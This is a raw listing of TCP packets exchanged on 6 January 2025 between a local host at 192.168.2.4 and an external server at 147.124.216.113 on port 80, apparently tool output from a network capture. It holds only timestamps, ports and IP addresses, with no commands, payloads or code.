                                                                                                                                                                        Jan 6, 2025 07:53:15.840926886 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840936899 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840946913 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840956926 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840960026 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840967894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840977907 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840987921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840987921 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841005087 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841020107 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841068983 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841078997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841089010 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841099024 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841104984 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841135025 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841192961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841207981 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841219902 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841245890 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841285944 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841296911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841305017 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841315985 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841325045 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841351986 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841389894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841399908 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841409922 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841418982 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841428041 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841430902 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841445923 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841484070 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841619015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841674089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841711044 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841747046 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841758013 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841773033 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841782093 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841794968 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841815948 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841818094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841830015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841839075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841872931 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.854453087 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887326002 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887352943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887366056 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887373924 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887376070 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887387991 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887397051 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887428999 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887648106 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887681961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887691975 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887701988 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887717962 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887718916 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887728930 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887741089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887742043 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887772083 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887842894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887852907 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887862921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887872934 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887887955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887891054 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887911081 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887911081 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887938976 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887943029 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887980938 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888020992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888036966 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888050079 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888072968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888073921 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888088942 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888099909 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888108969 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888109922 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888119936 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888134956 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888164997 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888258934 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888269901 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888281107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888298988 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888322115 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888333082 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888343096 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888386965 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888457060 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888468027 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888478994 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888489962 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974734068 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.974750996 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.974762917 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974775076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974785089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974795103 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974806070 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.974836111 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.974987984 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974997997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975008965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975032091 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975105047 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975116968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975126028 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975145102 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975171089 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975203037 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975220919 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975230932 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975240946 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975250959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975260973 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975261927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975271940 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975275040 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975286961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975301981 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975333929 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975469112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975486040 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975502968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975544930 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975600004 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975625992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975641966 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975646973 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.975653887 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.975677967 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.012952089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013000965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013005018 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013015032 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013037920 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013050079 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013061047 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013066053 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013072014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013082027 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013092041 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013101101 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013106108 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013143063 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013185024 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013217926 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013225079 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013227940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013276100 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013279915 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013292074 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013303041 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013326883 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013326883 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013340950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013367891 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013437986 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013448000 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013463974 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013488054 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013505936 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.013514996 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013525963 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.013565063 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014255047 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014286041 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014296055 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014317989 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014326096 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014334917 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014355898 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014437914 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014448881 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014458895 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014467955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014481068 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014509916 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014522076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014565945 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014571905 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014576912 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014622927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014626980 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014635086 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014708042 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014735937 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014774084 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014791012 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014826059 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014839888 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014851093 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.014879942 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.014981031 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015007973 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015022039 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.015024900 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015038013 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015048981 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015058994 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015067101 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.015091896 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.015185118 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015197039 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015206099 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015224934 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.015233994 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.015254974 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015265942 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.015305042 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101475954 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101512909 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101530075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101546049 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101564884 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101674080 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101700068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101707935 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101830959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101841927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101850986 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101866961 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101888895 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101912022 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101922989 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101948977 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101963997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101974964 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101984978 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102011919 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102019072 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102030039 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102054119 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102089882 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102101088 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102127075 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102277994 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102288961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102299929 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102318048 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102336884 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102354050 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102365017 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102374077 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102385998 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102406025 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102421999 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102468967 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102479935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102516890 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147700071 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147741079 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147752047 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147763014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147778988 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147788048 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147790909 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147802114 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147813082 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147814035 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147846937 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147861958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147872925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147883892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147916079 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147938967 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147949934 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147959948 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147973061 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147989988 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148170948 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148183107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148192883 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148205996 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148226976 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148238897 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148248911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148260117 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148261070 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148276091 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148468018 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148480892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148492098 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148499966 CET4973980192.168.2.4147.124.216.113
